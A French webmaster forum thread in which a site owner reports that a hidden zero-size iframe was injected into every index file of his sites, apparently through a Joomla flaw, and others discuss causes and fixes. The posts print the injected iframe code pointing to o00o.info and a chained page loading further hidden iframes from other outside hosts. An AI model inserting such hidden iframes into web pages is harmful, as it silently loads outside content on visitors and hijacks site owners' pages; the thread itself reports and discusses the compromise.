On s'est fait hacker ?

[Franck]

Bonjour,

Nous étions content que notre site soit valide soit valide XHTML1...

Mais depuis quelques temps 34 fautes sont apparues... J'ai pensé à des problèmes dans le code...

Mais finalement nous avons trouvé un code similaire dans tous nos fichiers index même sur des répertoires contenant de simples essais de cms non référencés par google...

Je suis surpris ! Et je me demande si d'autres personnes ont eu le même problème... ?

Auriez-vous des conseils au niveau sécurité serveur, meme si à priori nos le failles de sécurité sont à jour.

Voici le code en question qui était inséré en dehors du body (


<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>


Merci pour votre aide !!!

Franck

[Suede]

http://www.google.fr/search?sourceid=na ... 0o+%2Einfo
par exemple

[Franck]

oui ça aurait un rapport avec joomla...?

Mais on l'a installé il y a 6 mois et les fichiers ont été modifiés il y a 10 jours...

[kool76]

J'allais faire la même remarque

Et compléter par le code source de la page de la frame :

Code: Tout sélectionner

<iframe width=0 height=0 src=http://www.donefind.com/smartppc/portal.php?affzb=1&username=yoho></iframe><iframe width=0 height=0 src=http://www.hadbest.net/search/portal.php?affzb=1&username=xiz></iframe><iframe width=0 height=0 src=http://www.slowern.com/search/portal.php?username=had></iframe>


Un hack qui ne sert que des intérêts financiers je pense...

[Franck]

Je vois en tout cas que c'est toujours le meme "username=xiz"

grrrr !

[david96]

J'ai regardé ton code source et je n'y ai point vu de <iframe....> après le </body>
De plus chez moi ta page est bien valide Xhtml T
Ça pourrait peut être venir d'un soft que tu as en local, ça m'avais fait un cas similaire avec Norton (que j'ai désinstallé depuis belle lurette maintenant )

[Franck]

Sur notre site principal c'est normal on l'a retiré...

Mais c'est encore sur des sous-repertoires de cms que l'on a testé...

En fait ce code c'est inseré dans tous nos fichiers index...

Exemple d'url ou on ne l'a pas encore retiré :

Remplacez le Z par un y
http://www.experts-referencement.com/Zacs/

c'est tout en bas du code de cette page..

[Franck]

Merci quand meme david

[david96]

Bon sang mais comment peut-il intégrer ce code en écriture sur vos fichiers ?
Vérifie tes CHMOD sur ton FTP au cas où !
En sachant le comment on pourra éradiquer le hacker, reste à savoir comment il fait ?

[Franck]

Je me disais qu'il avait peut être développe un script qui exploite les failles de sécurité et qui modifie les fichiers index...

ça lui génère peut être des milliers de liens !!!

En tout cas ça doit être automatisé car il a inséré ça dans tous nos index...

[Franck]

"kool76"

De mon coté il me semble que je n'avais pas plus de code que ce que j'ai copie collé...

[mahefarivony]

amusant de lire les memes sujets (au fait édites ton titres) sur les forums de webmastering

un lien interessant
http://forum.joomla.org/index.php?topic=86820.0

[Franck]

Merci beaucoup pour ce lien

[i-liquid]

c'est pas la première fois que je vois ce genre de posts

[Audiofeeline]

C'est le principal probleme des scripts populaires (phpbb & co)...
Ceci-dit ce cms est plutôt bien fait...